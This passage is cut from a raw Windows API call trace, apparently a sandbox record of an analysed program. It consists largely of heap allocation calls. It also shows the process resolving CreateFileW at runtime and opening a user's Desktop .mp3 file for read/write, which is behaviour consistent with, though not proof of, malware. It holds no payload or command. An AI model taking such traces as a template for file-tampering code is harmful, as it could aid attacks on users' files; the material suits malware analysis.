(HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.224] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.224] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.224] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.224] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.224] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0077.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0077.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0077.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0077.225] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0077.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0077.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e450 [0077.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e450, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.225] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0077.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9mgct.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0077.226] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0077.226] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.226] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0077.226] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0077.226] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0077.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0077.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.227] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0077.228] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.228] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0077.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0077.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.228] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.228] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.228] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0077.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0077.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0077.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0077.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0077.229] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0077.229] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0077.230] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0077.231] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a7770 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a7770 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.231] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0077.231] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0077.232] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0077.233] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0077.234] HeapFree (in: hHeap=0x650000, 